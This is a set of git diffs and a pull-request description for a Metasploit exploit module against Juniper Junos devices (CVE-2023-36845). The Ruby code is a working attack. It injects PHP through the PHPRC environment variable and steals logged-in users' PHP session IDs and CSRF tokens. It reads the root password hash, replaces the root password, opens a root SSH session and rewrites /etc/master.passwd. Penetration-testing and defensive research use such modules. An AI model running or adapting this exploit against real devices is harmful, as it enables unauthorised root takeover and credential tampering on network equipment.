     print_status("Original encrypted root password: #{og_encrypted_root_pass}")
@@ -203,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def set_new_root_password(php_session_id, csrf_token)
-    password_hash = UnixCrypt::SHA512.build(datastore['PASSWORD'])
+    password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])
     print_status "Temporary root password Hash: #{password_hash}"
 
     post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"
@@ -227,14 +243,14 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
     end
-    print_status("Successfully changed the root user's password to #{datastore['PASSWORD']}")
+    print_status("Successfully changed the root user's password to #{datastore['TMP_ROOT_PASSWORD']}")
   end
 
   def ssh_login
     ssh_opts = ssh_client_defaults.merge({
       port: datastore['SSH_PORT'],
       auth_methods: ['password'],
-      password: datastore['PASSWORD']
+      password: datastore['TMP_ROOT_PASSWORD']
     })
 
     begin

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -101,25 +101,6 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def on_new_session(session)
-    super
-    if target['Type'] == :nix_stream
-      print_status('Rewriting the original root password hash to /etc/master.passwd')
-
-      tmp_file_name = rand_text_alphanumeric(8..16)
-
-      commands = [
-        "awk -F: -v originalpass='#{@og_encrypted_root_pass}' 'BEGIN {OFS=FS} $1==\"root\" {$2=originalpass} {print}' /etc/master.passwd > /tmp/#{tmp_file_name}",
-        "cp /tmp/#{tmp_file_name} /etc/master.passwd",
-        "rm /tmp/#{tmp_file_name}"
-      ]
-
-      commands.each do |command|
-        session.shell_command_token(command)
-      end
-    end
-  end
-
   def check
     non_existent_file = rand_text_alphanumeric(8..16)
     res = send_request_cgi(
@@ -229,10 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
     og_encrypted_root_pass
   end
 
-  def set_new_root_password(php_session_id, csrf_token)
-    password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])
-    print_status "Temporary root password Hash: #{password_hash}"
-
+  def set_root_password(php_session_id, csrf_token, password_hash)
     post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),
@@ -254,7 +232,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
     end
-    print_status("Successfully changed the root user's password to #{datastore['TMP_ROOT_PASSWORD']}")
+    print_status("Successfully changed the root user's password ")
   end
 
   def ssh_login
@@ -286,12 +264,16 @@ class MetasploitModule < Msf::Exploit::Remote
       php_session_id = get_php_session_id
       csrf_token = get_csrf_token(php_session_id)
       @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token)
-      set_new_root_password(php_session_id, csrf_token)
+      tmp_password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])
+      print_status "Temporary root password Hash: #{tmp_password_hash}"
+      set_root_password(php_session_id, csrf_token, tmp_password_hash)
 
       if (ssh = ssh_login)
         print_good('Logged in as root')
         handler(ssh.lsock)
       end
+
+      set_root_password(php_session_id, csrf_token, @og_encrypted_root_pass)
 
     when :php_memory
       send_php_exploit('/dev/fd/0', payload.encoded)

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -3,11 +3,16 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'unix_crypt'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::SSH
 
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -37,9 +42,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2023-36845']
         ],
         'License' => MSF_LICENSE,
-        'Platform' => 'php',
+        'Platform' => %w[php unix],
         'Privileged' => false,
-        'Arch' => ARCH_PHP,
+        'Arch' => [ARCH_PHP, ARCH_CMD] ,
         'Targets' => [
           ['Junos OS SRX Firewall / EX Switch', {}]
         ],
@@ -52,35 +57,197 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+
+    register_options([
+                       OptBool.new('JAIL_BREAK', [false, 'Break out of FreeBSD jail by changing the root users password. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that root logon is enabled on the device', false]),
+                       OptString.new('PASSWORD', [ false, 'If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password', rand_text_alphanumeric(8)]),
+                       OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),
+                       OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+                     ])
+
   end
 
   def check
+    non_existent_file = rand_text_alphanumeric(8..16)
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
       'ctype' => 'application/x-www-form-urlencoded',
-      'data' => 'LD_PRELOAD=/tmp/ld'
+      'data' => "LD_PRELOAD=/tmp/#{non_existent_file}"
     )
 
-    return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?('Cannot open "/tmp/ld"')
+    return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?("Cannot open \"/tmp/#{non_existent_file}\"")
 
     CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.')
   end
 
-  def exploit
+  def send_php_exploit(phprc, file_contents)
     post_data = "allow_url_include=1\n"
-    post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(payload.encoded)}\""
-
+    post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\""
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path),
       'method' => 'POST',
       'data' => post_data,
       'ctype' => 'application/x-www-form-urlencoded',
       'vars_get' => {
-        'PHPRC' => '/dev/fd/0'
+        'PHPRC' => phprc
+      }
+    )
+  end
+
+  # def on_new_session(client)
+  #   super
+  #
+  #
+  # end
+
+  def get_php_session_id
+    get_var_sess  = "<?php print_r(scandir('/var/sess'));?>"
+    res = send_php_exploit('/dev/fd/0', get_var_sess)
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+    php_session_id = res.body.scan(%r{\[\d+\] => sess_(.*)}).flatten[0]
+
+    fail_with(Failure:: UnexpectedReply, "Failed to retrieve PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
+    print_status("Found PHPSESSID: #{php_session_id}.")
+    php_session_id
+  end
+
+  def get_csrf_token(php_session_id)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/diagnose'),
+      'method' => 'GET',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}",
+        },
+      'vars_get' => {
+        'm[]' => 'pinghost'
       }
     )
 
-    print_error('The exploitation attempt returned a response which indicates exploitation was unsuccessful.') if res
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+    csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text
+    fail_with(Failure:: UnexpectedReply, "Unable to retrieve a csrf token") unless csrf_token
+    print_status("Found csrf token: #{csrf_token}.")
+    csrf_token
+  end
+
+  def get_encrypted_root_password(php_session_id, csrf_token)
+
+    post_data = "rs=get_cli_data&rsargs[]=getQuery&csrf_token=#{csrf_token}&key=1"
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/jsdm/ajax/cli-editor.php'),
+      'method' => 'POST',
+      'data' => post_data,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}",
+        }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+    #Multple passwords are displayed in the output, we want to grab the system section first before attempting to located a password
+    system_section = res.body.scan(/system \{([^}]+)\}/m).flatten[0]
+    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the system configuration section and thus the root password from the response') unless system_section
+
+    encrypted_root_password = system_section.scan(/\".*\";/)
+    print_status("Encrypted root password: #{encrypted_root_password}")
+  end
+
+  def set_new_root_password(php_session_id, csrf_token)
+
+    password_hash = UnixCrypt::SHA512.build(datastore['PASSWORD'])
+    puts "Password Hash: #{password_hash}"
+
+    post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/editor/edit/configuration/system/root-authentication'),
+      'method' => 'POST',
+      'data' => post_data,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}",
+        },
+      'vars_get' => {
+        'action' => 'commit'
+      }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+
+     unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
+       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
+     end
+    print_status("Successfully changed the root user's password to #{datastore['PASSWORD']}" )
+  end
+
+
+  def ssh_login
+
+    require 'pry-byebug'
+    binding.pry
+
+    ssh_opts = ssh_client_defaults.merge({
+                                           port: datastore['SSH_PORT'],
+                                           auth_methods: ['password'],
+                                           password: datastore['PASSWORD']
+                                         })
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(datastore['RHOSTS'], 'root', ssh_opts)
+      end
+    rescue Net::SSH::Exception => e
+      vprint_error("#{e.class}: #{e.message}")
+      return nil
+    end
+
+    if ssh
+      print_status('Creating SSH::CommandStream')
+      conn = Net::SSH::CommandStream.new(ssh)
+      ssh = nil
+      return conn
+    end
+
+  end
+
+
+
+  def ssh_stuff
+
+
+    Net::SSH::CommandStream.new(ssh_connection)
+
+  end
+
+  def exploit
+
+    if datastore['JAIL_BREAK']
+      php_session_id = get_php_session_id
+      csrf_token = get_csrf_token(php_session_id)
+      @encrypted_root_password = get_encrypted_root_password(php_session_id, csrf_token)
+      set_new_root_password(php_session_id, csrf_token)
+
+      if (ssh = ssh_login)
+        print_good("Logged in as root")
+        handler(ssh.lsock)
+      end
+
+    else
+      send_php_exploit('/dev/fd/0', payload.encoded)
+    end
+
   end
 end

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
             },
           ],
           [
-            'Interactive WebSocket with jail break',
+            'Interactive SSH with jail break',
             {
               'Arch' => ARCH_CMD,
               'Platform' => 'unix',
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TMP_ROOT_PASSWORD', [ true, 'If target is set to "Interactive WebSocket with jail break", the root user\'s password will be temporarily changed to this password', rand_text_alphanumeric(24)]),
+      OptString.new('TMP_ROOT_PASSWORD', [ true, 'If target is set to "Interactive SSH with jail break", the root user\'s password will be temporarily changed to this password', rand_text_alphanumeric(24)]),
       OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),
       OptInt.new('SSH_TIMEOUT', [ true, 'The maximum acceptable amount of time to negotiate a SSH session', 30])
     ])


### PR DESCRIPTION
This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls
and EX switches. It basically sets PHPRC to stdin (`/dev/fd/0`) and then uses some nifty PHP functions (`allow_url_include` and `auto_prepend_file`) to load a PHP payload inline. More details in the module description.

## Verification

Steps needed to make sure this thing works:

- [ ] Start msfconsole
- [ ] Do: `use freebsd/http/junos_phprc_auto_prepend_file`
- [ ] Set the `RHOST`, `LHOST`
- [ ] Run the module
- [ ] Receive a Meterpreter session as the `nobody` user.

## Fun facts
This CVE that allows for unauthenticated RCE has a CVSS score of 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
